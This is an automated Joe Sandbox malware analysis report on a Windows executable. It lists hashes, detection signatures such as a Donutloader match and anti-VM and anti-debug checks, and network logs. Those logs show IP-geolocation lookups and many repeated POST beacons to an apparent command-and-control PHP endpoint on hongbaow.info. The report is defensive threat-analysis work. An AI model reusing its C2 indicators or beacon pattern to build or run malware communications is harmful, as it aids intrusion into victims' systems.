Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jhdfer3s_jh3de.exe

Overview

General Information

Sample name:jhdfer3s_jh3de.exe
Analysis ID:1596616
MD5:446fee24759b2800c4ee7851930f07aa
SHA1:11378467db1872cb74b03738a7dc65abf1cc9459
SHA256:c12deb8079c75ef4b96f4af778fbb811a5c766f0560d57d63d6772fbe76b6b33
Tags:exejhdfer3s_jh3deuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jhdfer3s_jh3de.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\jhdfer3s_jh3de.exe" MD5: 446FEE24759B2800C4EE7851930F07AA)
    • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3626968274.0000000000D10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x33908:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x36e3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3627003255.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x76f30:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x7a466:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-22T08:41:51.184237+010028032742Potentially Bad Traffic192.168.2.44973134.160.111.145443TCP
2025-01-22T08:41:51.870256+010028032742Potentially Bad Traffic192.168.2.449732104.26.7.214443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: jhdfer3s_jh3de.exeVirustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: jhdfer3s_jh3de.exeJoe Sandbox ML: detected
Source: jhdfer3s_jh3de.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.214:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: jhdfer3s_jh3de.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: NTCreateprocess.pdb source: jhdfer3s_jh3de.exe
Source: Binary string: NTCreateprocess.pdbP$$$ source: jhdfer3s_jh3de.exe
Source: global trafficTCP traffic: 192.168.2.4:55896 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 104.26.7.214 104.26.7.214
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: myexternalip.com
Source: unknownDNS query: name: api.iplocation.net
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 34.160.111.145:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 104.26.7.214:443
Source: global trafficHTTP traffic detected: GET /raw HTTP/1.1User-Agent: Mozilla/5.0Host: myexternalip.com
Source: global trafficHTTP traffic detected: GET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1User-Agent: Mozilla/5.0Host: api.iplocation.net
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0292C280 GetModuleHandleA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,GetModuleFileNameW,HttpOpenRequestA,HttpSendRequestA,HttpOpenRequestA,HttpSendRequestA,0_2_0292C280
Source: global trafficHTTP traffic detected: GET /raw HTTP/1.1User-Agent: Mozilla/5.0Host: myexternalip.com
Source: global trafficHTTP traffic detected: GET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1User-Agent: Mozilla/5.0Host: api.iplocation.net
Source: global trafficDNS traffic detected: DNS query: myexternalip.com
Source: global trafficDNS traffic detected: DNS query: api.iplocation.net
Source: global trafficDNS traffic detected: DNS query: hongbaow.info
Source: unknownHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.iplocation.net/
